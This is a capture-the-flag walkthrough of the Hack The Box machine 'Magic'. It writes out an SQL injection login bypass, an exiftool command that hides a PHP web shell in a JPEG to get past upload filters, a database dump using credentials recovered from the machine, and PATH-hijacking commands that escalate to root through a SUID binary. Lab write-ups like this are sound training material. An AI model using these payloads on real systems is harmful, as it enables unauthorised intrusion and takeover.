Hack The Box - Magic

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled.png

NMAP :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%201.png

Enumerating Web :

⇒ There’s an login page : http://10.10.10.185/login.php

→ We are able to login by performing SQLi :

admin' or 1=1; --';

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%202.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%203.png

→ Uploaded images go to : http://10.10.10.185/images/uploads/

Exploiting Upload

⇒ There are filters which restrict us to upload php files. So we will use image magic bytes to bypass the check.

→ Lets use exiftool to embed our php script to an jpeg image :

exiftool -DocumentName="<h1>Enox<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';}__halt_compiler();?></h1>" index.jpeg

→ Now we will rename the file to index.php.jpeg and upload it

→ Lets access it : http://10.10.10.185/images/uploads/index.php.jpeg

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%204.png

We have command execution , lets pop an shell.

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%205.png

Privilege Escalation to User

⇒ We found an interesting file db.php5 in the web folder :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%206.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%207.png

⇒ We got mysql credentials. Lets use it to dump everything in the database.

mysqldump -u theseus -piamkingtheseus Magic

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%208.png

→ We got some credentials : Th3s3usW4sK1ng

⇒ We are able to switch to theseus user using the credentials :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%209.png

Privilege Escalation to Root

→ After running linenum.sh we find an interesting SUID :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%2010.png

⇒ Escalating Privileges using path variable

https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

→ After running strings on the binary we see the following interesting things :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%2011.png

→ We see that full path isnt specified so we can perform path hijacking.

cd /tmp
echo "/bin/bash" > lshw
chmod 777 lshw
echo $PATH
export PATH=/tmp:$PATH
cd /bin
./sysinfo

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%2012.png

→ We can’t get any output so lets get an reverse shell using python reverse shell from pentest monkey

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Magic%20Box%20d4eab9cb53084b0e825a0a891a772325/Untitled%2013.png